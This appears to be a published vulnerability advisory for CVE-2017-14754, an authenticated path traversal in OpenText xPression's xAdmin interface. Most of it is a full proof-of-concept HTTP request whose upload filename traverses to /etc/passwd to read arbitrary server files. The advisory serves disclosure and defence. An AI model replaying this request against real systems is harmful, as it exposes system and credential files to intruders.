Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - Arbitrary File Read Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14754 Affected Software: ================== OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) Exploit was tested on: ====================== v4.5SP1 Patch 13 (older versions might be affected as well) Arbitrary File Read: ==================== Authenticated user is able to read arbitrary system file due to path traversal issue. Vector : -------- 1) visit https://[...]/xAdmin/html/cm_datasource_summary.jsp and select data source 2) modify and save datasource. xsd_datasource_schema_file parameter filename is vulnerable: POST /xAdmin/html/cm_datasource_group_xsd.jsp?action=get_schema_m HTTP/1.1 Host: [...] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://[...]/xAdmin/html/cm_datasource_group_dispatcher.jsp?action=modify&refresh=yes&group_name=%43%75%73%74%6f%6d%65%72%58%58%45%74%65%73%74%27 Cookie: JSESSIONID=[...]; hideHeaderAndFooter=false Connection: close Content-Type: multipart/form-data; boundary=---------------------------11140219741229998994791588049 Content-Length: 1472 -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="xsd_datasource_group_id" 301 -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="group_name" aaa -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="group_name_old" aaa -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="xsd_datasource_schema_source" fromServer -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="xsd_datasource_schema_location" aaa.xml -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="xsd_datasource_schema_file"; filename="../../../../../../../../../../../../../../../../etc/passwd" Content-Type: application/octet-stream -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="delimiter_xpath" e -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="customer_key_xpath" e -----------------------------11140219741229998994791588049 Content-Disposition: form-data; name="xsd_datasource_schema" -----------------------------11140219741229998994791588049-- In response, file contents are returned: HTTP/1.1 200 OK [...]